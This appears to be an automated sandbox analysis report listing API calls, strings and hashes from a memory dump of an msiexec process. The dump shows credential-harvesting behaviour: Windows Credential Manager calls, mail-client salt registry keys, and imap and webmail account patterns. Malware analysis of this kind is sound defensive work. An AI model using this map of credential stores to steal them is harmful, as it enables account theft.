                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2449869053-232097475
                                                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                              APIs
                                                                                              • sprintf.MSVCRT ref: 0040957B
                                                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                              • sprintf.MSVCRT ref: 004095EB
                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                              • memset.MSVCRT ref: 0040961C
                                                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                              • API String ID: 3259144588-3822380221
                                                                                              • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                              • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                              APIs
                                                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                              • API String ID: 2449869053-4258758744
                                                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                              APIs
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • strlen.MSVCRT ref: 00443AD2
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                              • memset.MSVCRT ref: 00443B2E
                                                                                              • memset.MSVCRT ref: 00443B4B
                                                                                              • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                              • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                              Strings
                                                                                              • Salt, xrefs: 00443BA7
                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                              • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                              • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                              • API String ID: 4030136668-2687544566
                                                                                              • Opcode ID: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                                              • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                              • Opcode Fuzzy Hash: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                                              • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                              APIs
                                                                                              • wcsstr.MSVCRT ref: 0040426A
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                              • strchr.MSVCRT ref: 004042F6
                                                                                              • strlen.MSVCRT ref: 0040430A
                                                                                              • sprintf.MSVCRT ref: 0040432B
                                                                                              • strchr.MSVCRT ref: 0040433C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                              • String ID: %s@gmail.com$www.google.com
                                                                                              • API String ID: 3866421160-4070641962
                                                                                              • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                              • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                              APIs
                                                                                              • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                              • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                              • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                              • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                              • memset.MSVCRT ref: 004097BD
                                                                                              • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                              • API String ID: 1035899707-3647959541
                                                                                              • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                              • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                              • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                              • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                              APIs
                                                                                              • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy
                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                              • API String ID: 714388716-318151290
                                                                                              • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                              • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                              • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                              • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                              APIs
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                              • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                              • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                              • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                              • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                              • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                              • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                              • SetFocus.USER32(?), ref: 0040CB92
                                                                                              • SetFocus.USER32(?), ref: 0040CC0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                              • String ID:
                                                                                              • API String ID: 1416211542-0
                                                                                              • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                              • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                              • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                              • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                              • API String ID: 2360744853-2229823034
                                                                                              • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                              • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                              APIs
                                                                                              • strchr.MSVCRT ref: 004100E4
                                                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                              • _mbscat.MSVCRT ref: 0041014D
                                                                                              • memset.MSVCRT ref: 00410129
                                                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                              • memset.MSVCRT ref: 00410171
                                                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                              • _mbscat.MSVCRT ref: 00410197
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                              • String ID: \systemroot
                                                                                              • API String ID: 912701516-1821301763
                                                                                              • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                              • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                              APIs
                                                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                              • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                              Strings
                                                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                              • API String ID: 1640410171-2022683286
                                                                                              • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                              • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                              • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                              • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                              APIs
                                                                                                • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                              • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                              • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$strlen
                                                                                              • String ID: -journal$-wal$immutable$nolock
                                                                                              • API String ID: 2619041689-3408036318
                                                                                              • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                              • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                              • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                              • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$strlen
                                                                                              • String ID:
                                                                                              • API String ID: 667451143-3916222277
                                                                                              • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                              • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                              • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                              • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                              APIs
                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                              • wcslen.MSVCRT ref: 0040874A
                                                                                              • wcsncmp.MSVCRT ref: 00408794
                                                                                              • memset.MSVCRT ref: 0040882A
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                              • wcschr.MSVCRT ref: 0040889F
                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                              • String ID: J$Microsoft_WinInet
                                                                                              • API String ID: 3318079752-260894208
                                                                                              • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                              • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                              • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                              • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                              APIs
                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                              • API String ID: 3718511928-2409096184
                                                                                              • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                              • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004037EB
                                                                                              • memset.MSVCRT ref: 004037FF
                                                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                              • strchr.MSVCRT ref: 0040386E
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                              • strlen.MSVCRT ref: 00403897
                                                                                              • sprintf.MSVCRT ref: 004038B7
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                              • String ID: %s@yahoo.com
                                                                                              • API String ID: 2240714685-3288273942
                                                                                              • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                              • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                              • API String ID: 2780580303-317687271
                                                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                              APIs
                                                                                              • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                              • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                              • strlen.MSVCRT ref: 00406CCC
                                                                                              • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                              • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
